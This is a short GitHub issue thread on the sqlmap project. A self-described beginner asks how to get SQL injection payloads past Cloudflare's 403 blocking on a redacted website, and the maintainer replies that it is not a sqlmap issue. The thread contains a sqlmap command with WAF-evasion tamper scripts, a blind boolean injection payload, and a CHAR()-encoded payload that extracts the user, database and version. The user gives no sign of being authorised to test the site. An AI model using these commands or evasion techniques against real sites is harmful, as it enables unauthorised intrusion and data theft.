### ISSUE TITLE
CloudFlare and 403 Forbidden

### ISSUE THREAD

**Issue by jda3** [sqlmapproject/sqlmap#2630]
Hi Team, i have a website protected with cloudflare and i've used "between,randomcase,space2comment" as tamper script but i got 403 forbidden so ive tried to inject it manually using hackbar,when i encode the payload using Char() convert 403 disappear ! i add charencode to my tamper script but still same issue so i've copied sqlmap payload and past it on my browser it work ! any idea ?
my cmd
`sqlmap --random-agent -u "https://www.xxxxx.com/blog/latest-deals/" --data="page_number_0=*" --tamper="between,randomcase,space2comment,charencode" --is-dba -v3`

`sqlmap resumed the following injection point(s) from stored session:
---
Parameter: page_number_0 (POST)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)
    Payload: page_number_0=-2371 OR ELT(1477=1477,8879)-- tuOh
    Vector: OR ELT([INFERENCE],[RANDNUM])`

i think if you tell me how i can encode payload like this format will solve the issue
`CHAR(67, 79, 78, 67, 65, 84, 95, 87, 83, 40, 67, 72, 65, 82, 40, 51, 50, 44, 53, 56, 44, 51, 50, 41, 44, 117, 115, 101, 114, 40, 41, 44, 100, 97, 116, 97, 98, 97, 115, 101, 40, 41, 44, 118, 101, 114, 115, 105, 111, 110, 40, 41, 41)`

**Comment by stamparm** [comment]
This is not an issue of sqlmap. You should manually assess the target.

**Comment by jda3** [comment]
Dear Stampram,
i know it's not an issues but i will appreciate if you can help me or give me any helpul link as i still beginner with sql injection
